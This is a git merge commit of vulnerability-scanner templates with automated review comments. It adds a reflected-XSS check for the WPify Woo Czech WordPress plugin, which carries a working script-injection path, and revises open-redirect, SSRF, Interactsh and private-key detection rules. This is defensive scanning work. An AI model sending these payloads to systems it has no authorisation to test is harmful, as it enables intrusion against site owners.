Merge branch 'master' into dashboard

patch-1
Prince Chaddha 2022-06-28 08:42:51 +05:30 committed by GitHub
commit 28d6f55f15
7 changed files with 70 additions and 25 deletions


@ -22,3 +22,4 @@ vulnerabilities/other/royalevent/royalevent-management-xss.yaml
vulnerabilities/other/royalevent/royalevent-stored-xss.yaml vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
vulnerabilities/wordpress/new-user-approve-xss.yaml vulnerabilities/wordpress/new-user-approve-xss.yaml
vulnerabilities/wordpress/sym404.yaml vulnerabilities/wordpress/sym404.yaml
vulnerabilities/wordpress/wpify-woo-czech-xss.yaml


@ -28,10 +28,10 @@ requests:
- type: word - type: word
words: words:
- "<h1> Interactsh Server </h1>" - "Interactsh Server"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/06/27 # Enhanced by mp on 2022/06/27
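Review bot: The word matcher on the new side now fires on the bare phrase `Interactsh Server` instead of the `<h1>` heading, and the only other gate is status 200, so any page that merely mentions the phrase (a proxy error page, a doc page, a page that quotes this template) now satisfies it; the same loosening appears in the CVE-2021-27748 and interactsh-server sections below. If the Interactsh landing page markup changed, a comment above the word should record that, e.g. `# Interactsh landing page no longer wraps the title in <h1>; match the text only`, and adding `part: body` plus a second token distinctive to that page would keep the condition tight. The hunk header shows the matcher block begins before line 28, so the request and any `matchers-condition` for this template are outside the visible hunk.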


@ -15,7 +15,10 @@ info:
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2021-22873 cve-id: CVE-2021-22873
cwe-id: CWE-601 cwe-id: CWE-601
tags: cve,cve2021,redirect metadata:
shodan-query: http.favicon.hash:106844876
verified: "true"
tags: cve,cve2021,redirect,revive
requests: requests:
- method: GET - method: GET
@ -30,12 +33,8 @@ requests:
stop-at-first-match: true stop-at-first-match: true
redirects: true redirects: true
max-redirects: 2 max-redirects: 2
matchers-condition: and
matchers: matchers:
- type: status - type: regex
status: part: header
- 200 regex:
- type: word - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
words:
- "<h1> Interactsh Server </h1>"
part: body
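Review bot: `verified: "true"` in the added metadata block is a quoted string, while the other metadata blocks in this commit (CVE-2021-27748, interactsh-server, wpify-woo-czech-xss) use the boolean `verified: true`, so tooling that reads this flag sees two types for the same field; change it to `verified: true`. Replacing the status-plus-body pair with a single header regex on `Location` is the right signal for an open redirect, and dropping `matchers-condition: and` is consistent with having only one matcher left. The regex line carries its regex101 link inline; a short comment above it stating what it is meant to reject, e.g. `# only a redirect whose host ends in interact.sh counts`, would spare the next reader the trip.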


@ -12,6 +12,9 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
classification: classification:
cve-id: CVE-2021-27748 cve-id: CVE-2021-27748
metadata:
verified: true
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve,cve2021,hcl,ibm,ssrf,websphere tags: cve,cve2021,hcl,ibm,ssrf,websphere
requests: requests:
@ -28,9 +31,8 @@ requests:
- type: word - type: word
words: words:
- "<h1> Interactsh Server </h1>" - "Interactsh Server"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/06/27


@ -13,12 +13,12 @@ file:
extractors: extractors:
- type: regex - type: regex
regex: regex:
- "\"BEGIN OPENSSH PRIVATE KEY\"" - "BEGIN OPENSSH PRIVATE KEY"
- "\"BEGIN PRIVATE KEY\"" - "BEGIN PRIVATE KEY"
- "\"BEGIN RSA PRIVATE KEY\"" - "BEGIN RSA PRIVATE KEY"
- "\"BEGIN DSA PRIVATE KEY\"" - "BEGIN DSA PRIVATE KEY"
- "\"BEGIN EC PRIVATE KEY\"" - "BEGIN EC PRIVATE KEY"
- "\"BEGIN PGP PRIVATE KEY BLOCK\"" - "BEGIN PGP PRIVATE KEY BLOCK"
- "\"ssh-rsa\"" - "ssh-rsa"
- "\"ssh-dsa\"" - "ssh-dsa"
- "\"ssh-ed25519\"" - "ssh-ed25519"
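Review bot: With the escaped surrounding quotes removed, `ssh-rsa`, `ssh-dsa` and `ssh-ed25519` are now plain unanchored substrings, and those tokens are exactly what public key files carry (`authorized_keys`, `known_hosts`, `*.pub`), so the extractor will report public key material as a private key finding. The `BEGIN … PRIVATE KEY` entries are unambiguous on their own; drop the three key-type tokens, or anchor them to the PEM delimiters, e.g. `- "-----BEGIN (OPENSSH|RSA|DSA|EC) PRIVATE KEY-----"`. The extractor list starts at line 13 per the hunk header; the rest of the `file:` stanza is outside the visible hunk.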


@ -4,6 +4,9 @@ info:
name: Interactsh Server name: Interactsh Server
author: pdteam author: pdteam
severity: info severity: info
metadata:
verified: true
shodan-query: http.html:"Interactsh Server"
tags: tech,interactsh tags: tech,interactsh
requests: requests:
@ -11,14 +14,19 @@ requests:
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "<h1> Interactsh Server </h1>" - "Interactsh Server"
- type: status
status:
- 200
extractors: extractors:
- type: regex - type: regex
group: 1 group: 1
regex: regex:
- '<b>(.*)<\/b> server' - '<b>(.*)<\/b> server'
- 'from <b>(.*)<\/b>' - 'from <b>(.*)<\/b>'
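Review bot: The new side drops both `matchers-condition: and` and the `type: status` / `- 200` matcher, leaving a single word match on `Interactsh Server`, so a non-200 response whose body mentions the phrase is reported as an Interactsh server. If the status gate was removed on purpose, a comment above `matchers:` should say so, e.g. `# status check dropped: the landing page is matched on body text only`; otherwise restore the status matcher together with `matchers-condition: and`. The extractor regex `<b>(.*)<\/b> server` is unchanged but greedy, so on a line with more than one `<b>` it captures from the first one; `(.*?)` would be tighter if that case occurs.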


@ -0,0 +1,35 @@
id: wpify-woo-czech-xss
info:
name: WPify Woo Czech < 3.5.7 - Reflected Cross-Site Scripting (XSS)
author: Akincibor
severity: medium
description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..
reference:
- https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
metadata:
verified: true
tags: wp,wordpress,xss,wp-plugin,wpify
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- 'Add a new VAT ID to the queue'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
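Review bot: The `description` value is a single plain scalar of roughly 330 characters that ends with a doubled period (`output)..`); write it as a `description: >-` folded block scalar wrapped at the repository's line length and drop the extra period. The matcher set itself is sound: the body matcher requires both the reflected payload and the page's own `Add a new VAT ID to the queue` text under `condition: and`, and the header and status matchers are joined by `matchers-condition: and`, so a reflection on an unrelated page does not satisfy the template.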